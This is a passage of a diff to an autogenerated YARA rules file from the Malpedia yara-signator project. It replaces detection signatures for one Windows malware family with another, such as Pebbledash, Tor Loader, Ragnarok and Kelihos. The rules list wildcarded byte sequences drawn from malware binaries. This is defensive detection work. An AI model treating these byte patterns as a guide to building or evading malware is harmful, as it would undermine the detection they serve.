= { ff15???????? 85c0 750e 8b45e8 8b4de4 50 51 } - $sequence_7 = { e8???????? eb02 33c0 c645fc01 8bf0 3bf3 7547 } - $sequence_8 = { e9???????? 686c010000 e8???????? 8bf0 83c404 897508 85f6 } - $sequence_9 = { 8d4df0 c745fc00000000 e8???????? 8b4704 85c0 7609 83f8ff } + $sequence_0 = { 8b5508 83c201 895508 8d45f4 } + $sequence_1 = { c705????????00000000 a1???????? 0305???????? 8945fc 8b4d0c } + $sequence_2 = { eb17 837df400 7511 6a01 e8???????? } + $sequence_3 = { 50 e8???????? 83c410 8b4df8 51 6a00 8b15???????? } + $sequence_4 = { 7507 b801000000 eb0d 8b4dfc 83c101 } + $sequence_5 = { 52 6a00 ff15???????? 68???????? 68???????? } + $sequence_6 = { e8???????? 83c404 0fbed8 c1e304 } + $sequence_7 = { 68e8030000 ff15???????? e9???????? 833d????????00 741e 8b0d???????? } + $sequence_8 = { 8b5510 8a45f9 8802 8b4d10 83c101 } + $sequence_9 = { 8b0d???????? 51 ff15???????? 6aff 8b15???????? } condition: - 7 of them and filesize <4734976 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Pebbledash_Auto : FILE +rule MALPEDIA_Win_Plaintee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3f16c34e-ab8c-5fd5-9a27-9934f8af2f6b" + id = "e3bbe66b-b26a-510d-8a1b-05b2e6f7426c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pebbledash_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plaintee_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "477e05e2df7e0e436b23bf26c9707de6486fd65cc8fb3dc50d94f319663b31bc" + logic_hash = "8bcc878fa501588c97ae4d4926e84d32a4619fd799353944068271d6d4e36727" score = 75 quality = 75 tags = "FILE" @@ -151918,32 +154709,32 @@ rule MALPEDIA_Win_Pebbledash_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 25ffff0000 3bd0 740a b800000004 e9???????? 83bd74fbffff00 751a } - $sequence_1 = { 8be5 5d c3 55 8bec 81ecd0000000 c68530ffffff8e } - $sequence_2 = { 51 e8???????? 83c418 8d55f0 52 8d85a4f3ffff 50 } - $sequence_3 = { 8d95a0f5ffff 52 ff15???????? 898594f7ffff 83bd94f7ffffff 7505 } - $sequence_4 = { a3???????? 833d????????00 742c 8b55f0 8955dc 8b45dc 8945e0 } - $sequence_5 = { 8d1c85609f4200 c1e603 8b03 f644300401 7469 57 } - $sequence_6 = { 8b08 8b550c 8b4110 8902 8d8d70feffff 51 8b550c } - $sequence_7 = { 8b45e8 83c001 8945e8 837de80e 733b } - $sequence_8 = { 51 e8???????? 83c40c 817d0c1e010000 7f15 837d101e } - $sequence_9 = { 8b55fc 0355e4 33c0 8a02 83f850 753b 8b4dfc } + $sequence_0 = { 8d4c2404 6a00 8d542404 51 52 ffd0 8b4c2400 } + $sequence_1 = { 8bf1 6802020000 ff15???????? 85c0 740a b001 } + $sequence_2 = { 50 8d853c010000 50 8b8538010000 6a5a 52 } + $sequence_3 = { 8d442400 56 50 8bf1 6802020000 ff15???????? } + $sequence_4 = { 5e 81c490010000 c3 8bce } + $sequence_5 = { 85f6 74c6 8bce e8???????? } + $sequence_6 = { f3ab 66ab b900010000 33c0 } + $sequence_7 = { eb02 33f6 8bce e8???????? 8a8669010000 } + $sequence_8 = { 68ac010000 e8???????? 83c404 85c0 7412 } + $sequence_9 = { 750a b001 5e 81c490010000 c3 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Tor_Loader_Auto : FILE +rule MALPEDIA_Win_Combos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a70795d3-ed07-58b1-af1f-1705de4529bb" + id = "1f17e5a0-ef31-5686-bb42-b8b65987952e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tor_loader_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.combos_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "5d8db358e57884a4955f1fc346221e8831cd43555daaec59fcf000e4dc8835e4" + logic_hash = "037e9ec47814518fd1ef388425768f46eed22a270b66cf4ee1793ac0871a3237" score = 75 quality = 75 tags = "FILE" @@ -151957,32 +154748,32 @@ rule MALPEDIA_Win_Tor_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb29 488d7a38 e8???????? 4889df 488b4c2440 6690 e8???????? } - $sequence_1 = { eb15 4c8d8f88000000 4889f8 4c89cf e8???????? 4889c7 488b4740 } - $sequence_2 = { e8???????? 48c7400810000000 488d0da0490c00 488908 833d????????00 6690 7509 } - $sequence_3 = { eb0c 41bc00000000 41bb00000000 0f8573feffff 4c8bac2480000000 4883bc248800000004 0f855cfeffff } - $sequence_4 = { e9???????? 4c89542478 4983f901 7560 488d05a10e1900 bb01000000 4889d9 } - $sequence_5 = { e8???????? 833d????????00 750e 488b8c24800d0000 48894818 eb11 488d7818 } - $sequence_6 = { e8???????? 488d05ca2e1300 e8???????? 48c7400826000000 488d0d358f1800 488908 4889c3 } - $sequence_7 = { e8???????? 488d05dc0e3100 bb04000000 e8???????? 488b8424d0000000 e8???????? 488d050b203100 } - $sequence_8 = { eb38 488b8c24c0020000 488b11 488b4238 6690 e8???????? 83f001 } - $sequence_9 = { e8???????? 48895c2450 4889c1 488d053fe00500 4889cb e8???????? 488b5c2450 } + $sequence_0 = { 57 68ffff1f00 8d45e4 50 } + $sequence_1 = { be???????? 8b4c2410 8bfb 8bc1 6a01 c1e902 f3a5 } + $sequence_2 = { 57 57 53 56 8b8dd8feffff } + $sequence_3 = { 89bdd4feffff 897dfc 8b4508 50 } + $sequence_4 = { 8d054c160110 83780800 754e b741 b35a b620 } + $sequence_5 = { 53 8d44240c 55 56 89442410 57 c744241000000000 } + $sequence_6 = { 740e 50 ff15???????? 830d????????ff c3 8b442404 c74050b0110110 } + $sequence_7 = { 7514 8b442408 8b4c2410 5e } + $sequence_8 = { 0bc5 33c1 8b848600ffffff 0bc7 5f 5e 5d } + $sequence_9 = { 83ec08 55 56 8b742414 85f6 0f8412010000 } condition: - 7 of them and filesize <13050880 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Ragnarok_Auto : FILE +rule MALPEDIA_Win_Jackpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a9bce1d7-5883-5de4-9b9b-a02072e8d068" + id = "095b3872-c166-52ad-a52d-1faeb1056a2e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ragnarok_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jackpos_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "4922b92876243cdefed80b6c256ba49e22b0c6eaa1ad052381af99f572200bea" + logic_hash = "45db7695f021a95c6d3c662e5ca72119b052256c8a3ceeaf6c22b39c2e1870c0" score = 75 quality = 75 tags = "FILE" @@ -151996,32 +154787,32 @@ rule MALPEDIA_Win_Ragnarok_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1f906 57 6bf838 894df4 8b048d28754300 8b540718 8955ec } - $sequence_1 = { 884219 0fb6461a 88421a 0fb6461b 88421b 0fb6461c 88421c } - $sequence_2 = { c1e908 0fb6c9 c1e308 c1ea10 0fb689105c4300 33d9 8b4dfc } - $sequence_3 = { 8bc8 2345a4 f7d1 234d9c 0bc8 c145980a } - $sequence_4 = { 0fb689104b4300 33d9 0fb6487e c1e308 0fb689104b4300 33d9 0fb6487d } - $sequence_5 = { 8b7d08 0fb6ca 333c8d105d4300 8bcf 897d08 334814 894d08 } - $sequence_6 = { 8b75dc 33f9 037dfc 81c64efd53a9 037d98 c1c209 } - $sequence_7 = { c1c205 8b7dac 0bc8 034dd8 81c7dcbc1b8f 0355bc 03f9 } - $sequence_8 = { 8b048528754300 c644032a0a 8b5d08 747f 8b45f8 8b5df0 8b048528754300 } - $sequence_9 = { 8bf8 89bdb8feffff ff36 68???????? ff35???????? e8???????? 8b4810 } + $sequence_0 = { 8b5604 eb03 8d5604 2bc7 03c0 50 } + $sequence_1 = { d1f8 03d0 eb0f 85c0 } + $sequence_2 = { 75ed 837df408 8b4dfc 7202 } + $sequence_3 = { 8b4508 e8???????? 8b7d08 8b550c 8b4718 3b7d10 747e } + $sequence_4 = { 52 8bf0 53 897588 e8???????? } + $sequence_5 = { 7303 8d45d8 8d4dac 51 50 e8???????? 8b55b4 } + $sequence_6 = { 85ff 7f87 5f 8bc6 5e 5b } + $sequence_7 = { 8b4604 33c9 66890c03 5f 8bc6 } + $sequence_8 = { 765a 8b4a14 57 3bc1 734e 2bc8 8bf9 } + $sequence_9 = { 037214 ebc4 5f 5e 5d } condition: - 7 of them and filesize <483328 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Manjusaka_Auto : FILE +rule MALPEDIA_Win_Bluenoroff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9f188d62-91cb-5093-86fd-1c78b358599b" + id = "c5a8ede1-c77a-5a4b-899a-3e41c1e4e510" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.manjusaka_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluenoroff_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "dab9ae475e0b441f3d26af80a0ebc722e21c766bc33599d09d1c1a5353ad7516" + logic_hash = "65b6fe6298815292c6af264e82e027897f56c9c87e000fed42924fa12c98e75b" score = 75 quality = 75 tags = "FILE" @@ -152035,32 +154826,32 @@ rule MALPEDIA_Win_Manjusaka_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ebb8 488d05b77a1000 4889442450 48c744245801000000 48c744246000000000 488d05f9b01100 4889442470 } - $sequence_1 = { 4c89bc2480040000 4c8939 4c897108 48895910 48c7411800800000 0f117018 48897930 } - $sequence_2 = { 791d 418b4128 41034124 4863c8 488bc2 48f7d8 48c1e00a } - $sequence_3 = { 89411c 488b45d7 2b4527 05feffff07 89710c 894120 8b45db } - $sequence_4 = { 4989f8 e8???????? 48ffcb 75ed 0f57f6 488d9c2410010000 0f297320 } - $sequence_5 = { 898c24f8000000 48896c2448 3b08 0f8c21fdffff 4c8bbc24f0000000 4d85f6 7424 } - $sequence_6 = { 814d4002020000 4533c0 48894500 498bcd 83c8ff 66894544 b8c8000000 } - $sequence_7 = { 89573c 48894740 895750 488b442e60 48894758 488b442e28 488b4860 } - $sequence_8 = { f7d8 894c2420 448bc5 498bcd 1bd2 4533c9 83e2fc } - $sequence_9 = { e8???????? 4889d9 e8???????? 488d4f70 e8???????? 488d8fe0000000 e8???????? } + $sequence_0 = { 83f802 750e 8d95fcfffeff 52 68???????? } + $sequence_1 = { 8d8df8feffff 51 ff15???????? 0fbe95f8feffff 68???????? } + $sequence_2 = { 85f6 743a 8d85fcfffeff 50 } + $sequence_3 = { 894e04 e8???????? 83c40c 5f } + $sequence_4 = { eb10 85c0 7514 8d85fcfffeff 50 68???????? } + $sequence_5 = { 83feff 7433 8d4e01 51 6a40 } + $sequence_6 = { 68ffff0000 50 e8???????? 33c0 } + $sequence_7 = { 56 6a10 68???????? e8???????? 83c410 813ed0c0b0a0 } + $sequence_8 = { 33ff 53 ff15???????? 8b450c 85c0 7402 } + $sequence_9 = { 50 0fb785f4fffeff 51 52 } condition: - 7 of them and filesize <4772864 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Dented_Auto : FILE +rule MALPEDIA_Win_Hikit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "484f6875-8da3-59df-9796-ec6e3c5f3480" + id = "bd6e764b-576f-54ee-bfa6-5e7a42269dfd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dented_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hikit_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "e9882555c27a882adee62a69216aa411600cf976159b592ea9f38f19d9990be3" + logic_hash = "dc92a800adf1985c32a4ddd1d9a2bce0a144c5995b6902cad53971cf4e90fb53" score = 75 quality = 75 tags = "FILE" @@ -152074,34 +154865,34 @@ rule MALPEDIA_Win_Dented_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf1 e8???????? 83c40c 89bd60ffffff 8d8560ffffff 50 ff15???????? } - $sequence_1 = { 50 51 ebc7 6a0f 33db 5f 897df4 } - $sequence_2 = { ffd6 ff75fc ffd6 6a00 6a01 8d4d08 e8???????? } - $sequence_3 = { ff15???????? 3d0e000780 7422 3d08000c80 741b } - $sequence_4 = { 8985c4fcffff 8d85f4fdffff 6a40 8985c8fcffff 8d85b4fcffff 5e 50 } - $sequence_5 = { 8d4dc0 e8???????? 385dc4 7508 6a04 } - $sequence_6 = { 6a40 5f 57 8d45b8 } - $sequence_7 = { 8b85f8f7ffff 8a8485fcfbffff 32c1 880416 8b8decf7ffff } - $sequence_8 = { 48 0d00ffffff 40 8a0a 8985f8f7ffff 8bbdf8f7ffff 0fb6c1 } - $sequence_9 = { 8b4a38 3b08 6a0f 0f4208 33db 8b4210 } + $sequence_0 = { 33c0 e9???????? 48 8d44244e 48 898424b8000000 48 } + $sequence_1 = { 89442428 48 837c242800 747e 33c0 83f801 7444 } + $sequence_2 = { c7432000000000 48 8b442430 48 83781800 741c 48 } + $sequence_3 = { e8???????? 8bf8 85ff 7408 81ff20a00400 7508 8b06 } + $sequence_4 = { 6a00 50 ff15???????? 85c0 0f84a3000000 33ff } + $sequence_5 = { 8bd5 8bce e8???????? f7d8 1bc0 40 894608 } + $sequence_6 = { 6689046e 8b2d???????? 53 ffd5 56 68???????? 8d4c2410 } + $sequence_7 = { 8d05b2210000 48 89442428 eb0d 48 8b442428 } + $sequence_8 = { 894120 48 8b4c2460 8b44240c 894104 48 8b4c2460 } + $sequence_9 = { 4c 8d442478 baffff1f00 ff15???????? 898424b0000000 83bc24b000000000 7444 } condition: - 7 of them and filesize <450560 + 7 of them and filesize <573440 } -rule MALPEDIA_Win_Kelihos_Auto : FILE +rule MALPEDIA_Win_Skipper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5eeb2760-12b0-5f38-935d-d1f5e018b5d9" + id = "4df8b68e-8938-5eb7-bba0-86905918e37c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kelihos_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skipper_auto.yar#L1-L431" license_url = "N/A" - logic_hash = "0a57f5287680233f80bcd1391dc843be1b51717107a9ac1743ac21e2bb163525" + logic_hash = "dd8f2a613ae1336f9183e3a024858c9c0abef8aafde3712e59fe4ab047db7609" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -152113,32 +154904,67 @@ rule MALPEDIA_Win_Kelihos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 59 59 c644241701 84c0 7505 c644241700 } - $sequence_1 = { ff7508 ff75fc ff7508 50 51 ff750c 56 } - $sequence_2 = { e8???????? 6a00 6a01 8d4dc0 e8???????? 8a45ef e8???????? } - $sequence_3 = { e8???????? b001 e8???????? c20800 6a18 b8???????? e8???????? } - $sequence_4 = { e8???????? 83c40c 53 6a01 8d8ddcfdffff e8???????? 53 } - $sequence_5 = { e8???????? c645fc02 807dd800 0f84f7000000 8b06 8b4004 03c6 } - $sequence_6 = { ff75ac 8d7db8 895da8 e8???????? 83c40c 84c0 0f840b010000 } - $sequence_7 = { 8b4d0c 8b5508 6a00 6a10 50 51 52 } - $sequence_8 = { c3 6a10 b8???????? e8???????? 8b7d08 33db 53 } - $sequence_9 = { e8???????? eb02 33c0 e8???????? c20400 83c1f8 8b01 } + $sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 } + $sequence_1 = { 59 5d c3 55 8bec 33c0 50 } + $sequence_2 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 } + $sequence_3 = { ff15???????? 6a00 6a00 6a00 6a00 68???????? 68???????? } + $sequence_4 = { e8???????? 6a04 e8???????? 8bf8 57 6a04 68???????? } + $sequence_5 = { 0fb6c3 03c8 81e1ff000080 7908 49 81c900ffffff 41 } + $sequence_6 = { 8b4d08 0fb68405fcfeffff 320439 47 8847ff 4e 0f8568ffffff } + $sequence_7 = { 7c0e 0fba25????????01 0f824a0e0000 57 8bf9 83fa04 7231 } + $sequence_8 = { e8???????? 83c404 6a00 6a64 52 50 } + $sequence_9 = { 8a85effeffff 888415f0feffff e9???????? c785dcfeffff00000000 } + $sequence_10 = { 898ddcfeffff 8b95dcfeffff 3b5514 0f8dcf000000 8b45f8 } + $sequence_11 = { 0fb6d2 8a8415f0feffff 8885eefeffff 8b4d10 038ddcfeffff 0fbe11 } + $sequence_12 = { c1e81f 03d0 418bc1 8d1492 } + $sequence_13 = { 0fb602 418800 44880a 410fb610 4103d1 } + $sequence_14 = { 81e2ff000080 7908 4a 81ca00ffffff 42 0fb6d2 8a8415f0feffff } + $sequence_15 = { 51 6a0b 68???????? 8b15???????? 52 68???????? e8???????? } + $sequence_16 = { 0fb645f8 8a8c15f0feffff 888c05f0feffff 0fb655fc 8a85effeffff } + $sequence_17 = { 33c9 4963e9 498bf8 488d1424 448bd1 8bc1 0f1f840000000000 } + $sequence_18 = { 4181c800ffffff 41ffc0 410fb6c0 488d1424 41ffc1 4803d0 48ffc3 } + $sequence_19 = { 81c900ffffff ffc1 4863c1 0fb61404 4403d2 4181e2ff000080 } + $sequence_20 = { 0fb6c2 49ffc3 0fb61404 4232541fff } + $sequence_21 = { 48896c2410 4889742418 48897c2420 4156 4881ec10010000 488b05???????? 4833c4 } + $sequence_22 = { 8b85e0feffff 83c001 8985e0feffff 81bde0feffff00010000 } + $sequence_23 = { 4232541fff 418853ff 48ffcb 0f8575ffffff } + $sequence_24 = { 81ec24010000 a1???????? 33c5 8945f4 c745f800000000 } + $sequence_25 = { 3d02010000 7513 8b4d08 e8???????? 68e8030000 ff15???????? } + $sequence_26 = { 7528 48833d????????00 741e 488d0de59b0000 e8???????? 85c0 740e } + $sequence_27 = { 895704 66a1???????? 66894708 8a0d???????? 884f0a e8???????? 0fb6d0 } + $sequence_28 = { 85d2 740c c785d4feffff3a040000 eb0a c785d4feffffffff1f00 } + $sequence_29 = { 68???????? 68???????? 8d4d20 0f434d20 68bb010000 51 50 } + $sequence_30 = { ffb5b0faffff e9???????? 8d8580faffff 50 6a00 ffb590faffff } + $sequence_31 = { 33c0 e9???????? 8975e4 33c0 39b8b8a62300 0f8491000000 } + $sequence_32 = { 488bc3 488d15cfa30000 48c1f805 83e11f 488b04c2 486bc958 } + $sequence_33 = { 48ffc8 90 80780100 488d4001 75f6 } + $sequence_34 = { ff15???????? 41b900800000 41b804010000 488bd3 488bcf ff15???????? } + $sequence_35 = { b81a000000 eb23 488d0da39a0000 48890c03 4883c130 } + $sequence_36 = { 8b0c85606d4100 c1e206 8a441124 3245fe 247f 30441124 8b37 } + $sequence_37 = { 8b7508 8d34f570a02300 391e 7404 } + $sequence_38 = { e8???????? 488db328010000 488d7b28 bd06000000 488d051dad0000 483947f0 } + $sequence_39 = { e8???????? 59 8945e4 8b7508 c7465cd8812300 33ff 47 } + $sequence_40 = { 8bff 55 8bec 8b4508 ff34c570a02300 } + $sequence_41 = { 8a80b4a62300 08443b1d 0fb64601 47 3bf8 } + $sequence_42 = { 488d1d24a50000 8bef 488b33 4885f6 } + $sequence_43 = { a3???????? a1???????? c705????????66162300 8935???????? a3???????? ff15???????? } + $sequence_44 = { 488d05a59a0000 740f 3908 740e 4883c010 4883780800 } condition: - 7 of them and filesize <4702208 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Leouncia_Auto : FILE +rule MALPEDIA_Win_Ironhalo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "39b73bd1-c371-5610-827d-6193acb69151" + id = "2d227622-166f-50b3-a1ee-3f19a045e93e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.leouncia_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ironhalo_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "ce0406952808d71dc84c670f24e39c297086db41d40b8ca03d26d62e66180e61" + logic_hash = "ff7e4c197682c2fb1b52bad6a60a31bcbdcc6f7acd7ddda36a5021d06aae5146" score = 75 quality = 75 tags = "FILE" @@ -152152,32 +154978,32 @@ rule MALPEDIA_Win_Leouncia_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f3ab 8d442408 50 56 } - $sequence_1 = { 52 50 a1???????? 8d8c248c050000 } - $sequence_2 = { 83c208 8908 8b4e04 894804 8a0d???????? } - $sequence_3 = { ff15???????? 5f b801000000 5e 81c438040000 c3 83c9ff } - $sequence_4 = { c3 55 56 57 8d542410 6a10 } - $sequence_5 = { 83c424 33d2 33ff 85c0 7e31 } - $sequence_6 = { c3 8bc8 83e01f c1f905 8b0c8d60c14000 } - $sequence_7 = { ff2485ba504000 834df0ff 8955cc 8955d8 8955e0 8955e4 8955fc } - $sequence_8 = { c744241c00000000 c744241400040000 c7450000000000 e8???????? 83c404 8bf0 8d442410 } - $sequence_9 = { ff2485ba504000 834df0ff 8955cc 8955d8 8955e0 8955e4 } + $sequence_0 = { 808821cf400008 40 3dff000000 72f1 } + $sequence_1 = { 33c0 8d7c245c 53 f3ab 8d4c2460 6a07 51 } + $sequence_2 = { 6a00 6a00 50 6a00 66c744246c0000 c744246801010000 } + $sequence_3 = { 8d542410 8d442424 52 50 ffd6 } + $sequence_4 = { 52 aa e8???????? 8dbc2434020000 } + $sequence_5 = { 5d c3 8b4c2404 f7c103000000 7414 8a01 41 } + $sequence_6 = { 3b35???????? 0f83c5010000 8bc6 83e61f c1f805 c1e603 8d1c8560e04000 } + $sequence_7 = { 8816 46 eb0f 0fb6d2 f68221cf400004 7403 40 } + $sequence_8 = { 8d542460 68???????? 52 ffd6 8d442460 68???????? 50 } + $sequence_9 = { 75d1 55 ff15???????? 5e 5f } condition: - 7 of them and filesize <114688 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Unidentified_096_Auto : FILE +rule MALPEDIA_Win_Webc2_Div_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "22c09f40-2011-5730-9e32-986d3f55e0d2" + id = "ec34042e-e794-5a2f-acc9-f1f4c0dd235a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_096_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_div_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "5261db5ca22f6df28b3364eb8987d65dbffd712b51f02eb4b92928e711dc9c45" + logic_hash = "11aa7a8bbe87a55b44481499db0ce13e00127df87edb76e8d3596bc6375e5a87" score = 75 quality = 75 tags = "FILE" @@ -152191,32 +155017,32 @@ rule MALPEDIA_Win_Unidentified_096_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 896c2444 c744244806000000 896c244c c744245010304000 } - $sequence_1 = { ff15???????? 8bf0 a1???????? 3bf0 } - $sequence_2 = { b021 a2???????? eb56 b040 a2???????? eb4d } - $sequence_3 = { b02b eb11 b02d eb0d f644240c01 740b b02e } - $sequence_4 = { 68???????? 52 e8???????? 83c424 8b4c242a 6683f930 0f8283000000 } - $sequence_5 = { 90 6aff 68???????? 68???????? 64a100000000 } - $sequence_6 = { 8b4c2420 8b54241c 8b442414 51 52 68ff000000 } - $sequence_7 = { 3dff000000 741d 8b4c2420 8b54241c 51 52 } - $sequence_8 = { b029 a2???????? eb5f b021 } - $sequence_9 = { 56 8b35???????? 57 6a14 ffd6 6a10 0fbfd8 } + $sequence_0 = { 5f e9???????? 6a3c 51 e9???????? 85c0 0f842c010000 } + $sequence_1 = { 81c2b4000000 69d260ea0000 895604 eb73 8d4505 50 } + $sequence_2 = { ff15???????? ff7508 8b35???????? 85c0 7512 } + $sequence_3 = { 771a 8b442414 0540f087fc 50 ffd5 015c2410 8144241460ce5800 } + $sequence_4 = { 894508 7509 57 ff15???????? eb54 a0???????? } + $sequence_5 = { 894c243c ff15???????? 85c0 5f 750a } + $sequence_6 = { f7d1 2bf9 8d95f0feffff 8bf7 8bfa 8bd1 } + $sequence_7 = { f7d1 49 8bf1 8d7e01 } + $sequence_8 = { 8885ecf9ffff 33c0 8dbdedf9ffff 8975f8 f3ab } + $sequence_9 = { 8bc5 bb16000000 99 f7ff 8bc1 8d3c9510114000 99 } condition: - 7 of them and filesize <25648 + 7 of them and filesize <32768 } -rule MALPEDIA_Win_Usbferry_Auto : FILE +rule MALPEDIA_Win_Firechili_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62065071-13fe-542b-a291-fb80bd43202d" + id = "1e675a4c-a97c-5312-b559-588fd9dfae94" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.usbferry_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.firechili_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "886d5513793c468df6b8e0477647a179848882846be144ad6058e6cfbd13a26d" + logic_hash = "39f362d1cc29968bda0685edf846cfad0cc3545d7d80fc48d26a5fd5a4bdf9c6" score = 75 quality = 75 tags = "FILE" @@ -152230,38 +155056,32 @@ rule MALPEDIA_Win_Usbferry_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 8b45e0 50 ff15???????? 85c0 742c } - $sequence_1 = { 8b9598f5ffff 2b9588f5ffff 8b8588f5ffff 89857cf5ffff 899578f5ffff } - $sequence_2 = { e9???????? ff75e0 a1???????? ff5060 8d45e0 } - $sequence_3 = { c3 3b0d???????? f27502 f2c3 f2e960030000 55 } - $sequence_4 = { 8b525c e8???????? 8b15???????? 8b4d84 ff7210 89425c } - $sequence_5 = { 803f2e 7402 33ff 85ff 7407 8d45e9 } - $sequence_6 = { c645df6f c645e06e c645e100 c685a4f5ffff00 68ff030000 } - $sequence_7 = { 2b858cf5ffff 8b8d8cf5ffff 898d84f5ffff 898580f5ffff 8d95a8feffff 83c2ff } - $sequence_8 = { 8b7d0c 33db 895ddc c745e000040000 895dfc 8d45dc } - $sequence_9 = { 89814c010000 8b09 e8???????? 8b0d???????? ff7110 8b9154010000 } - $sequence_10 = { ff7110 8b517c 894178 8b09 e8???????? 8b0d???????? } - $sequence_11 = { 8a460e 8bcf 